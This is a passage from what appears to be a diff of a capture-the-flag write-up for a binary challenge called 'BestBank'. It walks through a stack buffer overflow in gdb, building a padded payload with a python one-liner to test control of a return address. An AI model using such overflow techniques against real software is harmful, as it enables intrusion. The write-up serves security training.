starkindustries/laptop-hacking-coffee/Pwn/BestBank/README.md

 0x41414141 in ?? ()
 ```

-But can the `captcha` function's return instruction be controlled, which is the return at `0x8049277:ret`?
+This `ret` instruction lies in the `withdraw` function at address `0x8049306`.
+But can the `captcha` function's `ret` instruction at `0x8049277` be controlled?
 Experiment by adding a few more bytes to the payload:
 ```
 $ python3 -c "print('1 ' + 'A'*1012 + 'BBBB' + 'CCCC')" > payload
 ```

 Run the program again with this new payload.
-Continue until breakpoint at `0x08049276`:
+Continue until the breakpoint at `0x08049276`:
 ```
 (gdb) run < payload
 ...